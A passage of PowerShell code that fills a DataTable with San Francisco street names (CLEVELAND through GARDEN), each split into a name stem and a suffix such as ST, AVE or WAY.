$Streets.Rows.Add("CLEVELAND ST","","CLEVELAND","ST") + $null = $Streets.Rows.Add("CLIFFORD TER","","CLIFFORD","TER") + $null = $Streets.Rows.Add("CLINTON PARK","","CLINTON","PARK") + $null = $Streets.Rows.Add("CLIPPER ST","","CLIPPER","ST") + $null = $Streets.Rows.Add("CLIPPER TER","","CLIPPER","TER") + $null = $Streets.Rows.Add("CLIPPER COVE WAY","","CLIPPER COVE","WAY") + $null = $Streets.Rows.Add("CLOUD CIR","","CLOUD","CIR") + $null = $Streets.Rows.Add("CLOVER LN","","CLOVER","LN") + $null = $Streets.Rows.Add("CLOVER ST","","CLOVER","ST") + $null = $Streets.Rows.Add("CLYDE ST","","CLYDE","ST") + $null = $Streets.Rows.Add("COCHRANE ST","","COCHRANE","ST") + $null = $Streets.Rows.Add("CODMAN PL","","CODMAN","PL") + $null = $Streets.Rows.Add("COLBY ST","","COLBY","ST") + $null = $Streets.Rows.Add("COLE ST","","COLE","ST") + $null = $Streets.Rows.Add("COLEMAN ST","","COLEMAN","ST") + $null = $Streets.Rows.Add("COLERIDGE ST","","COLERIDGE","ST") + $null = $Streets.Rows.Add("COLIN PL","","COLIN","PL") + $null = $Streets.Rows.Add("COLIN P KELLY JR ST","","COLIN P KELLY JR","ST") + $null = $Streets.Rows.Add("COLLEEN WAY","","COLLEEN","WAY") + $null = $Streets.Rows.Add("COLLEGE AVE","","COLLEGE","AVE") + $null = $Streets.Rows.Add("COLLEGE TER","","COLLEGE","TER") + $null = $Streets.Rows.Add("COLLINGWOOD ST","","COLLINGWOOD","ST") + $null = $Streets.Rows.Add("COLLINS ST","","COLLINS","ST") + $null = $Streets.Rows.Add("COLON AVE","","COLON","AVE") + $null = $Streets.Rows.Add("COLONIAL WAY","","COLONIAL","WAY") + $null = $Streets.Rows.Add("COLTON ST","","COLTON","ST") + $null = $Streets.Rows.Add("COLUMBIA SQUARE ST","","COLUMBIA SQUARE","ST") + $null = $Streets.Rows.Add("COLUMBUS AVE","","COLUMBUS","AVE") + $null = $Streets.Rows.Add("COLUSA PL","","COLUSA","PL") + $null = $Streets.Rows.Add("COMERFORD ST","","COMERFORD","ST") + $null = $Streets.Rows.Add("COMMER CT","","COMMER","CT") + $null = $Streets.Rows.Add("COMMERCIAL ST","","COMMERCIAL","ST") + $null = $Streets.Rows.Add("COMMONWEALTH AVE","","COMMONWEALTH","AVE") + $null = $Streets.Rows.Add("COMPTON RD","","COMPTON","RD") + $null = $Streets.Rows.Add("CONCORD ST","","CONCORD","ST") + $null = $Streets.Rows.Add("CONCOURSE DR","","CONCOURSE","DR") + $null = $Streets.Rows.Add("CONGDON ST","","CONGDON","ST") + $null = $Streets.Rows.Add("CONGO ST","","CONGO","ST") + $null = $Streets.Rows.Add("CONKLING ST","","CONKLING","ST") + $null = $Streets.Rows.Add("CONNECTICUT ST","","CONNECTICUT","ST") + $null = $Streets.Rows.Add("CONRAD ST","","CONRAD","ST") + $null = $Streets.Rows.Add("STEUART LN","","STEUART","LN") + $null = $Streets.Rows.Add("BRAGHETTA LN","","BRAGHETTA","LN") + $null = $Streets.Rows.Add("CONSERVATORY ACCESS RD","","CONSERVATORY ACCESS","RD") + $null = $Streets.Rows.Add("CONSTANSO WAY","","CONSTANSO","WAY") + $null = $Streets.Rows.Add("CONTINUUM WAY","","CONTINUUM","WAY") + $null = $Streets.Rows.Add("CONVERSE ST","","CONVERSE","ST") + $null = $Streets.Rows.Add("COOK ST","","COOK","ST") + $null = $Streets.Rows.Add("COOPER ALY","","COOPER","ALY") + $null = $Streets.Rows.Add("COPPER ALY","","COPPER","ALY") + $null = $Streets.Rows.Add("CORA ST","","CORA","ST") + $null = $Streets.Rows.Add("CORAL CT","","CORAL","CT") + $null = $Streets.Rows.Add("CORAL RD","","CORAL","RD") + $null = $Streets.Rows.Add("CORALINO LN","","CORALINO","LN") + $null = $Streets.Rows.Add("CORBETT AVE","","CORBETT","AVE") + $null = $Streets.Rows.Add("CORBIN PL","","CORBIN","PL") + $null = $Streets.Rows.Add("CORDELIA ST","","CORDELIA","ST") + $null = $Streets.Rows.Add("CORDOVA ST","","CORDOVA","ST") + $null = $Streets.Rows.Add("CORNWALL ST","","CORNWALL","ST") + $null = $Streets.Rows.Add("CORONA ST","","CORONA","ST") + $null = $Streets.Rows.Add("FARALLON ST","","FARALLON","ST") + $null = $Streets.Rows.Add("CORONADO ST","","CORONADO","ST") + $null = $Streets.Rows.Add("CORTES AVE","","CORTES","AVE") + $null = $Streets.Rows.Add("CORTLAND AVE","","CORTLAND","AVE") + $null = $Streets.Rows.Add("CORWIN ST","","CORWIN","ST") + $null = $Streets.Rows.Add("COSGROVE ST","","COSGROVE","ST") + $null = $Streets.Rows.Add("COSMO PL","","COSMO","PL") + $null = $Streets.Rows.Add("COSO AVE","","COSO","AVE") + $null = $Streets.Rows.Add("COSTA ST","","COSTA","ST") + $null = $Streets.Rows.Add("COTTAGE ROW","","COTTAGE","ROW") + $null = $Streets.Rows.Add("COTTER ST","","COTTER","ST") + $null = $Streets.Rows.Add("COUNTRY CLUB DR","","COUNTRY CLUB","DR") + $null = $Streets.Rows.Add("COVENTRY CT","","COVENTRY","CT") + $null = $Streets.Rows.Add("COVENTRY LN","","COVENTRY","LN") + $null = $Streets.Rows.Add("COWELL PL","","COWELL","PL") + $null = $Streets.Rows.Add("COWLES ST","","COWLES","ST") + $null = $Streets.Rows.Add("CRAGMONT AVE","","CRAGMONT","AVE") + $null = $Streets.Rows.Add("CRAGS CT","","CRAGS","CT") + $null = $Streets.Rows.Add("CRAIG CT","","CRAIG","CT") + $null = $Streets.Rows.Add("CRANE ST","","CRANE","ST") + $null = $Streets.Rows.Add("CRANLEIGH DR","","CRANLEIGH","DR") + $null = $Streets.Rows.Add("CRAUT ST","","CRAUT","ST") + $null = $Streets.Rows.Add("CRESCENT AVE","","CRESCENT","AVE") + $null = $Streets.Rows.Add("CRESCENT CT","","CRESCENT","CT") + $null = $Streets.Rows.Add("CRESCENT WAY","","CRESCENT","WAY") + $null = $Streets.Rows.Add("CRESCIO CT","","CRESCIO","CT") + $null = $Streets.Rows.Add("CRESPI DR","","CRESPI","DR") + $null = $Streets.Rows.Add("CRESTA VISTA DR","","CRESTA VISTA","DR") + $null = $Streets.Rows.Add("CRESTLAKE DR","","CRESTLAKE","DR") + $null = $Streets.Rows.Add("CRESTLINE DR","","CRESTLINE","DR") + $null = $Streets.Rows.Add("CRESTMONT DR","","CRESTMONT","DR") + $null = $Streets.Rows.Add("CRESTWELL WALK","","CRESTWELL","WALK") + $null = $Streets.Rows.Add("CRISP RD","","CRISP","RD") + $null = $Streets.Rows.Add("CRISSY FIELD AVE","","CRISSY FIELD","AVE") + $null = $Streets.Rows.Add("CROAKER CT","","CROAKER","CT") + $null = $Streets.Rows.Add("CROOK ST","","CROOK","ST") + $null = $Streets.Rows.Add("CROSS ST","","CROSS","ST") + $null = $Streets.Rows.Add("CROSSOVER DR","","CROSSOVER","DR") + $null = $Streets.Rows.Add("CROWN CT","","CROWN","CT") + $null = $Streets.Rows.Add("CROWN TER","","CROWN","TER") + $null = $Streets.Rows.Add("CRYSTAL ST","","CRYSTAL","ST") + $null = $Streets.Rows.Add("CUBA ALY","","CUBA","ALY") + $null = $Streets.Rows.Add("CUESTA CT","","CUESTA","CT") + $null = $Streets.Rows.Add("CULEBRA TER","","CULEBRA","TER") + $null = $Streets.Rows.Add("CUMBERLAND ST","","CUMBERLAND","ST") + $null = $Streets.Rows.Add("CUNNINGHAM PL","","CUNNINGHAM","PL") + $null = $Streets.Rows.Add("CURTIS ST","","CURTIS","ST") + $null = $Streets.Rows.Add("CUSHMAN ST","","CUSHMAN","ST") + $null = $Streets.Rows.Add("CUSTER AVE","","CUSTER","AVE") + $null = $Streets.Rows.Add("CUSTOM HOUSE PL","","CUSTOM HOUSE","PL") + $null = $Streets.Rows.Add("CUTLER AVE","","CUTLER","AVE") + $null = $Streets.Rows.Add("CUVIER ST","","CUVIER","ST") + $null = $Streets.Rows.Add("CYPRESS ST","","CYPRESS","ST") + $null = $Streets.Rows.Add("CYRIL MAGNIN ST","","CYRIL MAGNIN","ST") + $null = $Streets.Rows.Add("CYRUS PL","","CYRUS","PL") + $null = $Streets.Rows.Add("D ST","","D","ST") + $null = $Streets.Rows.Add("DAGGETT ST","","DAGGETT","ST") + $null = $Streets.Rows.Add("DAKOTA ST","","DAKOTA","ST") + $null = $Streets.Rows.Add("DALEWOOD WAY","","DALEWOOD","WAY") + $null = $Streets.Rows.Add("DANIEL BURNHAM CT","","DANIEL BURNHAM","CT") + $null = $Streets.Rows.Add("DANTON ST","","DANTON","ST") + $null = $Streets.Rows.Add("DANVERS ST","","DANVERS","ST") + $null = $Streets.Rows.Add("DARIEN WAY","","DARIEN","WAY") + $null = $Streets.Rows.Add("DARRELL PL","","DARRELL","PL") + $null = $Streets.Rows.Add("DARTMOUTH ST","","DARTMOUTH","ST") + $null = $Streets.Rows.Add("DASHIELL HAMMETT ST","","DASHIELL HAMMETT","ST") + $null = $Streets.Rows.Add("DAVENPORT LN","","DAVENPORT","LN") + $null = $Streets.Rows.Add("DAVIDSON AVE","","DAVIDSON","AVE") + $null = $Streets.Rows.Add("DAVIS CT","","DAVIS","CT") + $null = $Streets.Rows.Add("DAVIS ST","","DAVIS","ST") + $null = $Streets.Rows.Add("DAWNVIEW WAY","","DAWNVIEW","WAY") + $null = $Streets.Rows.Add("DAWSON PL","","DAWSON","PL") + $null = $Streets.Rows.Add("DAY ST","","DAY","ST") + $null = $Streets.Rows.Add("DE BOOM ST","","DE BOOM","ST") + $null = $Streets.Rows.Add("DE FOREST WAY","","DE FOREST","WAY") + $null = $Streets.Rows.Add("DE HARO ST","","DE HARO","ST") + $null = $Streets.Rows.Add("DE LONG ST","","DE LONG","ST") + $null = $Streets.Rows.Add("DE MONTFORT AVE","","DE MONTFORT","AVE") + $null = $Streets.Rows.Add("DE SOTO ST","","DE SOTO","ST") + $null = $Streets.Rows.Add("DE WOLF ST","","DE WOLF","ST") + $null = $Streets.Rows.Add("DEARBORN ST","","DEARBORN","ST") + $null = $Streets.Rows.Add("DECATUR ST","","DECATUR","ST") + $null = $Streets.Rows.Add("DECKER ALY","","DECKER","ALY") + $null = $Streets.Rows.Add("DEDMAN CT","","DEDMAN","CT") + $null = $Streets.Rows.Add("DEEMS RD","","DEEMS","RD") + $null = $Streets.Rows.Add("DEHON ST","","DEHON","ST") + $null = $Streets.Rows.Add("DEL MONTE ST","","DEL MONTE","ST") + $null = $Streets.Rows.Add("DEL SUR AVE","","DEL SUR","AVE") + $null = $Streets.Rows.Add("DEL VALE AVE","","DEL VALE","AVE") + $null = $Streets.Rows.Add("DELANCEY ST","","DELANCEY","ST") + $null = $Streets.Rows.Add("DELANO AVE","","DELANO","AVE") + $null = $Streets.Rows.Add("DELAWARE ST","","DELAWARE","ST") + $null = $Streets.Rows.Add("DELGADO PL","","DELGADO","PL") + $null = $Streets.Rows.Add("DELLBROOK AVE","","DELLBROOK","AVE") + $null = $Streets.Rows.Add("DELMAR ST","","DELMAR","ST") + $null = $Streets.Rows.Add("DELTA ST","","DELTA","ST") + $null = $Streets.Rows.Add("DEMING ST","","DEMING","ST") + $null = $Streets.Rows.Add("DENSLOWE DR","","DENSLOWE","DR") + $null = $Streets.Rows.Add("DERBY ST","","DERBY","ST") + $null = $Streets.Rows.Add("DESMOND ST","","DESMOND","ST") + $null = $Streets.Rows.Add("DETROIT ST","","DETROIT","ST") + $null = $Streets.Rows.Add("DEVONSHIRE WAY","","DEVONSHIRE","WAY") + $null = $Streets.Rows.Add("DEWEY BLVD","","DEWEY","BLVD") + $null = $Streets.Rows.Add("DEWITT RD","","DEWITT","RD") + $null = $Streets.Rows.Add("DIAMOND ST","","DIAMOND","ST") + $null = $Streets.Rows.Add("DIAMOND COVE TER","","DIAMOND COVE","TER") + $null = $Streets.Rows.Add("DIAMOND HEIGHTS BLVD","","DIAMOND HEIGHTS","BLVD") + $null = $Streets.Rows.Add("DIANA ST","","DIANA","ST") + $null = $Streets.Rows.Add("DIAZ AVE","","DIAZ","AVE") + $null = $Streets.Rows.Add("DICHA ALY","","DICHA","ALY") + $null = $Streets.Rows.Add("DICHIERA CT","","DICHIERA","CT") + $null = $Streets.Rows.Add("DICKINSON ST","","DICKINSON","ST") + $null = $Streets.Rows.Add("DIGBY ST","","DIGBY","ST") + $null = $Streets.Rows.Add("DIRK DIRKSEN PL","","DIRK DIRKSEN","PL") + $null = $Streets.Rows.Add("DIVISADERO ST","","DIVISADERO","ST") + $null = $Streets.Rows.Add("DIVISION ST","","DIVISION","ST") + $null = $Streets.Rows.Add("DIXIE ALY","","DIXIE","ALY") + $null = $Streets.Rows.Add("DOCK ST","","DOCK","ST") + $null = $Streets.Rows.Add("DODGE ST","","DODGE","ST") + $null = $Streets.Rows.Add("DOLORES ST","","DOLORES","ST") + $null = $Streets.Rows.Add("DOLORES TER","","DOLORES","TER") + $null = $Streets.Rows.Add("DOLPHIN CT","","DOLPHIN","CT") + $null = $Streets.Rows.Add("DON CHEE WAY","","DON CHEE","WAY") + $null = $Streets.Rows.Add("DONAHUE ST","","DONAHUE","ST") + $null = $Streets.Rows.Add("DONNER AVE","","DONNER","AVE") + $null = $Streets.Rows.Add("DORADO TER","","DORADO","TER") + $null = $Streets.Rows.Add("DORANTES AVE","","DORANTES","AVE") + $null = $Streets.Rows.Add("DORCAS WAY","","DORCAS","WAY") + $null = $Streets.Rows.Add("DORCHESTER WAY","","DORCHESTER","WAY") + $null = $Streets.Rows.Add("DORE ST","","DORE","ST") + $null = $Streets.Rows.Add("DORIC ALY","","DORIC","ALY") + $null = $Streets.Rows.Add("DORLAND ST","","DORLAND","ST") + $null = $Streets.Rows.Add("DORMAN AVE","","DORMAN","AVE") + $null = $Streets.Rows.Add("DORMITORY RD","","DORMITORY","RD") + $null = $Streets.Rows.Add("DOUBLE ROCK ST","","DOUBLE ROCK","ST") + $null = $Streets.Rows.Add("DOUGLASS ST","","DOUGLASS","ST") + $null = $Streets.Rows.Add("DOVE LOOP","","DOVE","LOOP") + $null = $Streets.Rows.Add("DOW PL","","DOW","PL") + $null = $Streets.Rows.Add("DOWNEY ST","","DOWNEY","ST") + $null = $Streets.Rows.Add("DR CARLTON B GOODLETT PL","","DR CARLTON B GOODLETT","PL") + $null = $Streets.Rows.Add("DRAKE ST","","DRAKE","ST") + $null = $Streets.Rows.Add("DRUMM ST","","DRUMM","ST") + $null = $Streets.Rows.Add("DRUMMOND ALY","","DRUMMOND","ALY") + $null = $Streets.Rows.Add("DUBLIN ST","","DUBLIN","ST") + $null = $Streets.Rows.Add("DUBOCE AVE","","DUBOCE","AVE") + $null = $Streets.Rows.Add("DUDLEY RD","","DUDLEY","RD") + $null = $Streets.Rows.Add("DUKES CT","","DUKES","CT") + $null = $Streets.Rows.Add("DUNCAN ST","","DUNCAN","ST") + $null = $Streets.Rows.Add("DUNCOMBE ALY","","DUNCOMBE","ALY") + $null = $Streets.Rows.Add("DUNNES ALY","","DUNNES","ALY") + $null = $Streets.Rows.Add("DUNSHEE ST","","DUNSHEE","ST") + $null = $Streets.Rows.Add("DUNSMUIR ST","","DUNSMUIR","ST") + $null = $Streets.Rows.Add("DUTCH WINDMILL ACCESS RD","","DUTCH WINDMILL ACCESS","RD") + $null = $Streets.Rows.Add("DWIGHT ST","","DWIGHT","ST") + $null = $Streets.Rows.Add("E ST","","E","ST") + $null = $Streets.Rows.Add("EAGLE ST","","EAGLE","ST") + $null = $Streets.Rows.Add("EARL ST","","EARL","ST") + $null = $Streets.Rows.Add("EASEMENT","","EASEMENT","") + $null = $Streets.Rows.Add("EAST RD","","EAST","RD") + $null = $Streets.Rows.Add("EAST BEACH RD","","EAST BEACH","RD") + $null = $Streets.Rows.Add("EAST CRYSTAL COVE TER","","EAST CRYSTAL COVE","TER") + $null = $Streets.Rows.Add("EAST FORT MILEY RD","","EAST FORT MILEY","RD") + $null = $Streets.Rows.Add("EASTMAN ST","","EASTMAN","ST") + $null = $Streets.Rows.Add("EASTWOOD DR","","EASTWOOD","DR") + $null = $Streets.Rows.Add("EATON PL","","EATON","PL") + $null = $Streets.Rows.Add("ECKER ST","","ECKER","ST") + $null = $Streets.Rows.Add("EDDY ST","","EDDY","ST") + $null = $Streets.Rows.Add("EDGAR AVE","","EDGAR","AVE") + $null = $Streets.Rows.Add("EDGARDO PL","","EDGARDO","PL") + $null = $Streets.Rows.Add("EDGEHILL WAY","","EDGEHILL","WAY") + $null = $Streets.Rows.Add("EDGEWOOD AVE","","EDGEWOOD","AVE") + $null = $Streets.Rows.Add("EDIE RD","","EDIE","RD") + $null = $Streets.Rows.Add("EDINBURGH ST","","EDINBURGH","ST") + $null = $Streets.Rows.Add("EDITH ST","","EDITH","ST") + $null = $Streets.Rows.Add("EDNA ST","","EDNA","ST") + $null = $Streets.Rows.Add("EDWARD ST","","EDWARD","ST") + $null = $Streets.Rows.Add("EGBERT AVE","","EGBERT","AVE") + $null = $Streets.Rows.Add("EL CAMINO DEL MAR","","EL CAMINO DEL MAR","") + $null = $Streets.Rows.Add("EL DORADO ST","","EL DORADO","ST") + $null = $Streets.Rows.Add("EL MIRASOL PL","","EL MIRASOL","PL") + $null = $Streets.Rows.Add("EL PLAZUELA WAY","","EL PLAZUELA","WAY") + $null = $Streets.Rows.Add("EL POLIN LOOP","","EL POLIN","LOOP") + $null = $Streets.Rows.Add("EL SERENO CT","","EL SERENO","CT") + $null = $Streets.Rows.Add("EL VERANO WAY","","EL VERANO","WAY") + $null = $Streets.Rows.Add("ELDRIDGE ST","","ELDRIDGE","ST") + $null = $Streets.Rows.Add("ELGIN PARK","","ELGIN","PARK") + $null = $Streets.Rows.Add("ELIM ALY","","ELIM","ALY") + $null = $Streets.Rows.Add("ELIZABETH ST","","ELIZABETH","ST") + $null = $Streets.Rows.Add("ELK ST","","ELK","ST") + $null = $Streets.Rows.Add("ELLERT ST","","ELLERT","ST") + $null = $Streets.Rows.Add("ELLINGTON AVE","","ELLINGTON","AVE") + $null = $Streets.Rows.Add("ELLIOT ST","","ELLIOT","ST") + $null = $Streets.Rows.Add("ELLIS ST","","ELLIS","ST") + $null = $Streets.Rows.Add("ELLSWORTH ST","","ELLSWORTH","ST") + $null = $Streets.Rows.Add("ELM ST","","ELM","ST") + $null = $Streets.Rows.Add("ELMHURST DR","","ELMHURST","DR") + $null = $Streets.Rows.Add("ELMIRA ST","","ELMIRA","ST") + $null = $Streets.Rows.Add("ELMWOOD WAY","","ELMWOOD","WAY") + $null = $Streets.Rows.Add("ELSIE ST","","ELSIE","ST") + $null = $Streets.Rows.Add("ELWOOD ST","","ELWOOD","ST") + $null = $Streets.Rows.Add("EMERALD LN","","EMERALD","LN") + $null = $Streets.Rows.Add("EMERALD COVE WAY","","EMERALD COVE","WAY") + $null = $Streets.Rows.Add("EMERSON ST","","EMERSON","ST") + $null = $Streets.Rows.Add("EMERY LN","","EMERY","LN") + $null = $Streets.Rows.Add("EMIL LN","","EMIL","LN") + $null = $Streets.Rows.Add("EMMA ST","","EMMA","ST") + $null = $Streets.Rows.Add("EMMETT CT","","EMMETT","CT") + $null = $Streets.Rows.Add("ENCANTO AVE","","ENCANTO","AVE") + $null = $Streets.Rows.Add("ENCINAL WALK","","ENCINAL","WALK") + $null = $Streets.Rows.Add("ENCLINE CT","","ENCLINE","CT") + $null = $Streets.Rows.Add("ENGLISH ST","","ENGLISH","ST") + $null = $Streets.Rows.Add("ENTERPRISE ST","","ENTERPRISE","ST") + $null = $Streets.Rows.Add("ENTRADA CT","","ENTRADA","CT") + $null = $Streets.Rows.Add("ERIE ST","","ERIE","ST") + $null = $Streets.Rows.Add("ERKSON CT","","ERKSON","CT") + $null = $Streets.Rows.Add("ERVINE ST","","ERVINE","ST") + $null = $Streets.Rows.Add("ESCOLTA WAY","","ESCOLTA","WAY") + $null = $Streets.Rows.Add("ESCONDIDO AVE","","ESCONDIDO","AVE") + $null = $Streets.Rows.Add("ESMERALDA AVE","","ESMERALDA","AVE") + $null = $Streets.Rows.Add("ESPANOLA ST","","ESPANOLA","ST") + $null = $Streets.Rows.Add("ESQUINA DR","","ESQUINA","DR") + $null = $Streets.Rows.Add("ESSEX ST","","ESSEX","ST") + $null = $Streets.Rows.Add("ESTERO AVE","","ESTERO","AVE") + $null = $Streets.Rows.Add("EUCALYPTUS DR","","EUCALYPTUS","DR") + $null = $Streets.Rows.Add("EUCLID AVE","","EUCLID","AVE") + $null = $Streets.Rows.Add("EUGENIA AVE","","EUGENIA","AVE") + $null = $Streets.Rows.Add("EUREKA ST","","EUREKA","ST") + $null = $Streets.Rows.Add("EVANS AVE","","EVANS","AVE") + $null = $Streets.Rows.Add("EVE ST","","EVE","ST") + $null = $Streets.Rows.Add("EVELYN WAY","","EVELYN","WAY") + $null = $Streets.Rows.Add("EVERGLADE DR","","EVERGLADE","DR") + $null = $Streets.Rows.Add("EVERSON ST","","EVERSON","ST") + $null = $Streets.Rows.Add("EWER PL","","EWER","PL") + $null = $Streets.Rows.Add("EWING TER","","EWING","TER") + $null = $Streets.Rows.Add("EXCELSIOR AVE","","EXCELSIOR","AVE") + $null = $Streets.Rows.Add("EXCHANGE PL","","EXCHANGE","PL") + $null = $Streets.Rows.Add("EXECUTIVE PARK BLVD","","EXECUTIVE PARK","BLVD") + $null = $Streets.Rows.Add("EXETER ST","","EXETER","ST") + $null = $Streets.Rows.Add("EXPOSITION DR","","EXPOSITION","DR") + $null = $Streets.Rows.Add("FAIR AVE","","FAIR","AVE") + $null = $Streets.Rows.Add("FAIR OAKS ST","","FAIR OAKS","ST") + $null = $Streets.Rows.Add("FAIRBANKS ST","","FAIRBANKS","ST") + $null = $Streets.Rows.Add("FAIRFAX AVE","","FAIRFAX","AVE") + $null = $Streets.Rows.Add("FAIRFIELD WAY","","FAIRFIELD","WAY") + $null = $Streets.Rows.Add("FAIRMOUNT ST","","FAIRMOUNT","ST") + $null = $Streets.Rows.Add("FAITH ST","","FAITH","ST") + $null = $Streets.Rows.Add("FALLON PL","","FALLON","PL") + $null = $Streets.Rows.Add("FALMOUTH ST","","FALMOUTH","ST") + $null = $Streets.Rows.Add("FANNING WAY","","FANNING","WAY") + $null = $Streets.Rows.Add("FARALLONES ST","","FARALLONES","ST") + $null = $Streets.Rows.Add("FARGO PL","","FARGO","PL") + $null = $Streets.Rows.Add("FARNSWORTH LN","","FARNSWORTH","LN") + $null = $Streets.Rows.Add("FARNUM ST","","FARNUM","ST") + $null = $Streets.Rows.Add("FARRAGUT AVE","","FARRAGUT","AVE") + $null = $Streets.Rows.Add("FARVIEW CT","","FARVIEW","CT") + $null = $Streets.Rows.Add("FAUNTLEROY LN","","FAUNTLEROY","LN") + $null = $Streets.Rows.Add("FAXON AVE","","FAXON","AVE") + $null = $Streets.Rows.Add("FEDERAL ST","","FEDERAL","ST") + $null = $Streets.Rows.Add("FELIX AVE","","FELIX","AVE") + $null = $Streets.Rows.Add("FELL ST","","FELL","ST") + $null = $Streets.Rows.Add("FELL ACCESS RD","","FELL ACCESS","RD") + $null = $Streets.Rows.Add("FELLA PL","","FELLA","PL") + $null = $Streets.Rows.Add("FELTON ST","","FELTON","ST") + $null = $Streets.Rows.Add("FENTON LN","","FENTON","LN") + $null = $Streets.Rows.Add("FERN ST","","FERN","ST") + $null = $Streets.Rows.Add("FERNANDEZ ST","","FERNANDEZ","ST") + $null = $Streets.Rows.Add("FERNWOOD DR","","FERNWOOD","DR") + $null = $Streets.Rows.Add("FIELDING ST","","FIELDING","ST") + $null = $Streets.Rows.Add("MEADOW DR","","MEADOW","DR") + $null = $Streets.Rows.Add("FILBERT ST","","FILBERT","ST") + $null = $Streets.Rows.Add("FILLMORE ST","","FILLMORE","ST") + $null = $Streets.Rows.Add("FINLEY RD","","FINLEY","RD") + $null = $Streets.Rows.Add("01ST TI ST","","01ST TI","ST") + $null = $Streets.Rows.Add("HOLLAND CT","","HOLLAND","CT") + $null = $Streets.Rows.Add("FISHER ALY","","FISHER","ALY") + $null = $Streets.Rows.Add("FISHER AVE","","FISHER","AVE") + $null = $Streets.Rows.Add("FISHER LOOP","","FISHER","LOOP") + $null = $Streets.Rows.Add("FITCH ST","","FITCH","ST") + $null = $Streets.Rows.Add("FITZGERALD AVE","","FITZGERALD","AVE") + $null = $Streets.Rows.Add("FLINT ST","","FLINT","ST") + $null = $Streets.Rows.Add("FLOOD AVE","","FLOOD","AVE") + $null = $Streets.Rows.Add("FLORA ST","","FLORA","ST") + $null = $Streets.Rows.Add("FLORENCE ST","","FLORENCE","ST") + $null = $Streets.Rows.Add("FLORENTINE AVE","","FLORENTINE","AVE") + $null = $Streets.Rows.Add("FLORIDA ST","","FLORIDA","ST") + $null = $Streets.Rows.Add("FLOUNDER CT","","FLOUNDER","CT") + $null = $Streets.Rows.Add("FLOURNOY ST","","FLOURNOY","ST") + $null = $Streets.Rows.Add("FLOWER ST","","FLOWER","ST") + $null = $Streets.Rows.Add("FOERSTER ST","","FOERSTER","ST") + $null = $Streets.Rows.Add("FOLSOM ST","","FOLSOM","ST") + $null = $Streets.Rows.Add("FONT BLVD","","FONT","BLVD") + $null = $Streets.Rows.Add("FONTINELLA TER","","FONTINELLA","TER") + $null = $Streets.Rows.Add("FOOTE AVE","","FOOTE","AVE") + $null = $Streets.Rows.Add("FORD ST","","FORD","ST") + $null = $Streets.Rows.Add("FOREST RD","","FOREST","RD") + $null = $Streets.Rows.Add("FOREST HILL PATH","","FOREST HILL","PATH") + $null = $Streets.Rows.Add("FOREST KNOLLS DR","","FOREST KNOLLS","DR") + $null = $Streets.Rows.Add("FOREST SIDE AVE","","FOREST SIDE","AVE") + $null = $Streets.Rows.Add("FOREST VIEW DR","","FOREST VIEW","DR") + $null = $Streets.Rows.Add("FORSYTH LN","","FORSYTH","LN") + $null = $Streets.Rows.Add("FORT FUNSTON RD","","FORT FUNSTON","RD") + $null = $Streets.Rows.Add("FORT MASON 10","","FORT MASON 10","") + $null = $Streets.Rows.Add("FORT MASON 12","","FORT MASON 12","") + $null = $Streets.Rows.Add("FORT MASON 13","","FORT MASON 13","") + $null = $Streets.Rows.Add("FORT MASON 15","","FORT MASON 15","") + $null = $Streets.Rows.Add("FORT MASON 16","","FORT MASON 16","") + $null = $Streets.Rows.Add("FORT MASON 17","","FORT MASON 17","") + $null = $Streets.Rows.Add("FORT MASON 18","","FORT MASON 18","") + $null = $Streets.Rows.Add("FORT MASON 19","","FORT MASON 19","") + $null = $Streets.Rows.Add("FORT MASON 20","","FORT MASON 20","") + $null = $Streets.Rows.Add("FORT MASON 21","","FORT MASON 21","") + $null = $Streets.Rows.Add("FORT MASON 8","","FORT MASON 8","") + $null = $Streets.Rows.Add("FORT MASON 9","","FORT MASON 9","") + $null = $Streets.Rows.Add("FORT MILEY 3","","FORT MILEY 3","") + $null = $Streets.Rows.Add("FORT MILEY 5","","FORT MILEY 5","") + $null = $Streets.Rows.Add("FORT MILEY 6","","FORT MILEY 6","") + $null = $Streets.Rows.Add("FORT MILEY 7","","FORT MILEY 7","") + $null = $Streets.Rows.Add("FORTUNA AVE","","FORTUNA","AVE") + $null = $Streets.Rows.Add("FOUNTAIN ST","","FOUNTAIN","ST") + $null = $Streets.Rows.Add("FOWLER AVE","","FOWLER","AVE") + $null = $Streets.Rows.Add("FRANCE AVE","","FRANCE","AVE") + $null = $Streets.Rows.Add("FRANCIS ST","","FRANCIS","ST") + $null = $Streets.Rows.Add("FRANCISCO ST","","FRANCISCO","ST") + $null = $Streets.Rows.Add("FRANCONIA ST","","FRANCONIA","ST") + $null = $Streets.Rows.Add("FRANK NORRIS ST","","FRANK NORRIS","ST") + $null = $Streets.Rows.Add("FRANKLIN ST","","FRANKLIN","ST") + $null = $Streets.Rows.Add("FRATESSA CT","","FRATESSA","CT") + $null = $Streets.Rows.Add("FREDELA LN","","FREDELA","LN") + $null = $Streets.Rows.Add("FREDERICK ST","","FREDERICK","ST") + $null = $Streets.Rows.Add("FREDSON CT","","FREDSON","CT") + $null = $Streets.Rows.Add("FREELON ST","","FREELON","ST") + $null = $Streets.Rows.Add("FREEMAN CT","","FREEMAN","CT") + $null = $Streets.Rows.Add("FREMONT ST","","FREMONT","ST") + $null = $Streets.Rows.Add("FRENCH CT","","FRENCH","CT") + $null = $Streets.Rows.Add("FRESNEL WAY","","FRESNEL","WAY") + $null = $Streets.Rows.Add("FRESNO ST","","FRESNO","ST") + $null = $Streets.Rows.Add("FRIEDELL ST","","FRIEDELL","ST") + $null = $Streets.Rows.Add("FRIENDSHIP CT","","FRIENDSHIP","CT") + $null = $Streets.Rows.Add("FRONT ST","","FRONT","ST") + $null = $Streets.Rows.Add("FUENTE AVE","","FUENTE","AVE") + $null = $Streets.Rows.Add("FULTON ST","","FULTON","ST") + $null = $Streets.Rows.Add("FUNSTON AVE","","FUNSTON","AVE") + $null = $Streets.Rows.Add("FUNSTON RD","","FUNSTON","RD") + $null = $Streets.Rows.Add("GABILAN WAY","","GABILAN","WAY") + $null = $Streets.Rows.Add("GAISER CT","","GAISER","CT") + $null = $Streets.Rows.Add("GALEWOOD CIR","","GALEWOOD","CIR") + $null = $Streets.Rows.Add("GALILEE LN","","GALILEE","LN") + $null = $Streets.Rows.Add("GALINDO AVE","","GALINDO","AVE") + $null = $Streets.Rows.Add("GALLAGHER LN","","GALLAGHER","LN") + $null = $Streets.Rows.Add("GALVEZ AVE","","GALVEZ","AVE") + $null = $Streets.Rows.Add("GAMBIER ST","","GAMBIER","ST") + $null = $Streets.Rows.Add("GARCES DR","","GARCES","DR") + $null = $Streets.Rows.Add("GARCIA AVE","","GARCIA","AVE") + $null = $Streets.Rows.Add("GARDEN 